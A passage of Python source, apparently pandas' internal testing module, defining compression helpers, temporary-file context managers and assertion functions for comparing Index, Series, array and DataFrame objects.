raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
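# Illustrative sketch (not part of the original module): writing bytes with
# write_to_compressed and reading them back through decompress_file. The file
# suffix is hypothetical; ensure_clean (defined later in this module) supplies
# a temporary path that is removed afterwards.
def _example_compressed_round_trip():
    """Illustrative round trip through the two compression helpers above."""
    with ensure_clean("__example__.gz") as path:
        write_to_compressed("gzip", path, b"a,b\n1,2\n")
        with decompress_file(path, compression="gzip") as handle:
            assert handle.read() == b"a,b\n1,2\n"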
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
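# Illustrative sketch (not part of the original module): the dispatcher above
# accepts scalars, numpy arrays, Index, Series and DataFrame objects and
# compares them within rtol/atol.
def _example_assert_almost_equal():
    """Illustrative usage sketch of assert_almost_equal."""
    assert_almost_equal(1.000001, 1.000002)  # within the default rtol=1e-5
    assert_almost_equal(np.array([0.1, 0.2]), np.array([0.1, 0.2]))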
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
    Generate an array of random strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
    Generate one random string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
    Get a temporary path and remove it when the context exits.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
        :meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
    Get a temporary directory path and remove it when the context exits.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
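# Illustrative sketch (not part of the original module): environment changes made
# inside the context manager above do not leak out. The variable name is made up.
def _example_safe_environment():
    """Illustrative usage sketch of ensure_safe_environment_variables."""
    with ensure_safe_environment_variables():
        os.environ["PANDAS_EXAMPLE_FLAG"] = "1"  # hypothetical variable
    assert "PANDAS_EXAMPLE_FLAG" not in os.environ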
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
        Whether to compare numbers exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for more helpful error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
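# Illustrative sketch (not part of the original module): with the default
# exact="equiv", a RangeIndex and an equal-valued Int64Index compare as equal.
def _example_assert_index_equal():
    """Illustrative usage sketch of assert_index_equal."""
    assert_index_equal(RangeIndex(3), Index([0, 1, 2]))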
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
    Check attributes are equal. Both objects must have the attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
        Check that the integer dtype of the codes is the same.
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
    assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
    Check that the left and right numpy arrays are equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
        Whether to compare numbers exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
        Whether to compare numbers exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
        Whether to compare numbers exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
